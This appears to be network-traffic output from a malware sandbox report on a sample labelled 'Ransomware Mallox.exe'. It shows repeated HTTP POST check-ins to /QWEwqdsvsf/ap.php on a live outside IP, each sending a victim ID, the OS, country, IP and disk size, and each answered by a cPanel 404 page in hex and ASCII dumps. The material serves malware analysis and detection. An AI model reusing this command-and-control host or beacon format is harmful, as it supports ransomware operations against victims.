                    Data Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30
                    Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
                    Nov 5, 2024 13:23:32.564013004 CET1236INHTTP/1.1 404 Not Found
                    Date: Tue, 05 Nov 2024 12:23:32 GMT
                    Server: Apache
                    Accept-Ranges: bytes
                    Cache-Control: no-cache, no-store, must-revalidate
                    Pragma: no-cache
                    Expires: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Transfer-Encoding: chunked
                    Content-Type: text/html
                    Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                    Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .r
                    Nov 5, 2024 13:23:32.564126968 CET1236INData Raw: 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20
                    Data Ascii: esponse-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reas
                    Nov 5, 2024 13:23:32.564302921 CET1236INData Raw: 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a
                    Data Ascii: align: center; } .additional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left;
                    Nov 5, 2024 13:23:32.564657927 CET1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20
                    Data Ascii: } .reason-text { font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-head
                    Nov 5, 2024 13:23:32.564671040 CET1236INData Raw: 70 68 79 42 74 4e 48 78 48 51 6d 44 47 67 42 76 5a 6a 58 42 75 57 4e 32 67 6f 67 62 50 79 36 52 74 63 4f 65 6a 4e 50 78 46 6b 62 2b 43 45 59 68 48 43 66 6d 4a 36 44 51 53 68 66 45 47 66 4d 74 37 31 46 4f 50 67 70 45 31 50 48 4f 4d 54 45 59 38 6f
                    Data Ascii: phyBtNHxHQmDGgBvZjXBuWN2gogbPy6RtcOejNPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2
                    Nov 5, 2024 13:23:32.564683914 CET1236INData Raw: 43 77 54 42 75 38 57 33 30 73 53 49 69 53 37 50 39 4e 77 5a 37 43 67 41 65 44 6a 6c 61 4d 39 6b 74 41 44 30 2b 4d 78 77 72 73 65 38 58 73 54 61 4d 6f 52 49 6f 43 61 5a 6d 67 33 42 51 67 4c 71 72 48 56 43 42 75 33 71 68 57 33 2b 41 41 4f 68 77 70
                    Data Ascii: CwTBu8W30sSIiS7P9NwZ7CgAeDjlaM9ktAD0+Mxwrse8XsTaMoRIoCaZmg3BQgLqrHVCBu3qhW3+AAOhwp52QIAfQkAwoDHKzfNEYck4ZPp5qh5Cp4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4Q
                    Nov 5, 2024 13:23:32.565442085 CET1236INData Raw: 6c 4a 6d 75 73 6c 70 57 44 55 54 64 59 61 62 34 4c 32 7a 31 76 34 30 68 50 50 42 76 77 7a 71 4f 6c 75 54 76 68 44 42 56 42 32 61 34 49 79 78 2f 34 55 78 4c 72 78 38 67 6f 79 63 57 30 55 45 67 4f 34 79 32 4c 33 48 2b 55 6c 35 58 49 2f 34 76 6f 63
                    Data Ascii: lJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+
                    Nov 5, 2024 13:23:32.565454960 CET1236INData Raw: 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d
                    Data Ascii: %; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code">37404</span> <span class="status-reason">
                    Nov 5, 2024 13:23:32.565465927 CET647INData Raw: 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 73 65 72 76 65 72 22 3e 0d 0a 31 30 37 0d 0a 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                    Data Ascii: </li> <li class="info-server">107</li> </ul> </div> </div> </section> <footer> <div class="container"> <a href="http://


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.104982591.215.85.142807740C:\Users\user\Desktop\Ransomware Mallox.exe
                    TimestampBytes transferredDirectionData
                    Nov 5, 2024 13:23:33.058063984 CET334OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 91.215.85.142
                    Content-Length: 158
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30
                    Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
                    Nov 5, 2024 13:23:33.939791918 CET1236INHTTP/1.1 404 Not Found
                    Date: Tue, 05 Nov 2024 12:23:33 GMT
                    Server: Apache
                    Accept-Ranges: bytes
                    Cache-Control: no-cache, no-store, must-revalidate
                    Pragma: no-cache
                    Expires: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Transfer-Encoding: chunked
                    Content-Type: text/html
                    Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                    Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .r
                    Nov 5, 2024 13:23:33.939842939 CET1236INData Raw: 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20
                    Data Ascii: esponse-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reas
                    Nov 5, 2024 13:23:33.939855099 CET1236INData Raw: 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a
                    Data Ascii: align: center; } .additional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left;
                    Nov 5, 2024 13:23:33.940294027 CET636INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20
                    Data Ascii: } .reason-text { font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-head
                    Nov 5, 2024 13:23:33.940306902 CET1236INData Raw: 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34
                    Data Ascii: .additional-info { background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPAAAADqCAMAAACrxjhdAAAAt1BMVEUAAAAAAAD/////////////////////////////////////////////////////////////////////////////////////////////////
                    Nov 5, 2024 13:23:33.940319061 CET212INData Raw: 4f 4d 66 39 35 6b 2b 42 76 67 71 6f 67 43 46 43 78 32 32 4e 64 6c 74 4f 31 65 70 59 63 37 79 63 45 4b 53 61 49 39 2b 55 41 59 50 47 4f 6c 4b 44 51 59 79 78 44 50 39 4e 70 71 76 30 4e 4b 5a 6b 53 37 47 75 4e 52 51 69 67 35 70 76 61 59 51 77 64 54
                    Data Ascii: OMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+HxDHT4JKEe2prhxY1aCS5lY+HnXu6N+x6IJCRQQmEEz+Y
                    Nov 5, 2024 13:23:33.940696955 CET1236INData Raw: 6a 49 45 2f 78 73 2f 4d 6d 44 38 71 48 52 59 4b 35 43 41 48 75 61 54 59 35 6a 66 51 78 46 43 2f 59 6f 49 51 53 53 56 61 66 72 44 2b 57 4b 34 48 30 50 69 76 38 53 41 54 52 5a 43 68 45 58 69 4f 73 33 39 4c 2f 49 59 77 69 4f 78 52 48 67 65 45 4b 63
                    Data Ascii: jIE/xs/MmD8qHRYK5CAHuaTY5jfQxFC/YoIQSSVafrD+WK4H0Piv8SATRZChEXiOs39L/IYwiOxRHgeEKcmbMI9ccHRCdxUeYanFpQJMBUDIFxw1chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HC
                    Nov 5, 2024 13:23:33.940707922 CET1236INData Raw: 63 71 73 67 50 41 7a 43 56 47 46 57 7a 50 70 59 78 4a 4d 39 47 41 4d 58 68 47 52 69 6e 44 38 35 78 6b 72 43 78 45 6f 6d 45 59 37 49 37 6a 2f 34 30 49 45 76 6a 57 6c 4a 37 77 44 7a 6a 4a 5a 74 6d 62 43 57 2f 63 43 68 4f 50 50 74 6c 49 43 4d 47 58
                    Data Ascii: cqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJZtmbCW/cChOPPtlICMGXIAX3QFYQIRcI3Cq2ZNk3tYduunPxIpus8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMA
                    Nov 5, 2024 13:23:33.940720081 CET424INData Raw: 61 64 76 66 32 39 47 78 50 59 50 68 39 6e 2b 4d 6a 41 75 52 4e 67 2f 48 63 34 57 59 6d 38 57 6a 54 30 70 41 42 4e 42 37 57 6b 41 62 38 31 6b 7a 38 66 45 6f 35 4e 61 30 72 41 51 59 55 38 4b 51 45 57 45 50 53 6b 41 61 61 66 6e 52 50 69 58 45 47 48
                    Data Ascii: advf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%;
                    Nov 5, 2024 13:23:33.940732956 CET1236INData Raw: 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 65 63 69 6f 6e 20 63 6c 61
                    Data Ascii: le> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code">37404</span> <span class="status-reason">88Not Found</span> </s
                    Nov 5, 2024 13:23:33.961663008 CET611INData Raw: 69 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 73 65 72 76 65 72 22 3e 0d 0a 31 30 37 0d 0a 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: i class="info-server">107</li> </ul> </div> </div> </section> <footer> <div class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.104983891.215.85.142807740C:\Users\user\Desktop\Ransomware Mallox.exe
                    TimestampBytes transferredDirectionData
                    Nov 5, 2024 13:23:34.853372097 CET334OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 91.215.85.142
                    Content-Length: 158
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30
                    Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
                    Nov 5, 2024 13:23:35.756622076 CET1236INHTTP/1.1 404 Not Found
                    Date: Tue, 05 Nov 2024 12:23:35 GMT
                    Server: Apache
                    Accept-Ranges: bytes
                    Cache-Control: no-cache, no-store, must-revalidate
                    Pragma: no-cache
                    Expires: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Transfer-Encoding: chunked
                    Content-Type: text/html
                    Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                    Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .r
                    Nov 5, 2024 13:23:35.756850958 CET212INData Raw: 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20
                    Data Ascii: esponse-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; }
                    Nov 5, 2024 13:23:35.756906986 CET1236INData Raw: 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                    Data Ascii: .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additiona
                    Nov 5, 2024 13:23:35.757169008 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74
                    Data Ascii: text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60
                    Nov 5, 2024 13:23:35.757181883 CET1236INData Raw: 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20
                    Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom
                    Nov 5, 2024 13:23:35.757625103 CET1236INData Raw: 59 33 38 6d 6c 76 58 4b 44 64 55 35 70 44 48 33 54 52 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63
                    Data Ascii: Y38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20Yfi
                    Nov 5, 2024 13:23:35.757637024 CET848INData Raw: 63 6b 69 51 35 5a 4f 55 7a 6c 43 4f 4d 79 69 39 5a 2b 4c 58 52 45 68 53 35 69 71 72 49 34 51 6e 75 4e 6c 66 38 6f 56 45 62 4b 38 41 35 35 36 51 51 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39
                    Data Ascii: ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMr
                    Nov 5, 2024 13:23:35.758080959 CET1236INData Raw: 72 38 41 55 46 30 34 2f 44 6f 4d 49 2b 4e 68 31 5a 57 35 4d 34 63 68 4a 35 79 75 4e 52 4d 41 6e 76 37 54 68 30 50 77 50 37 34 70 54 6c 39 55 6a 50 5a 38 47 6a 31 39 50 59 53 6e 30 53 31 46 51 47 32 56 66 47 76 53 50 71 78 72 70 35 32 6d 42 4e 36
                    Data Ascii: r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y
                    Nov 5, 2024 13:23:35.758093119 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 37 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                    Data Ascii: width: 70%; } .status-code { font-size: 900%; } .status-reason { font-size: 450%; } } </style> </head> <body>
                    Nov 5, 2024 13:23:35.758104086 CET424INData Raw: 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 68 65 61 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 64 0d 0a 39 31 2e 32 31 35 2e 38 35 2e 31 34 32 0d 0a 31 39 0d 0a 2f
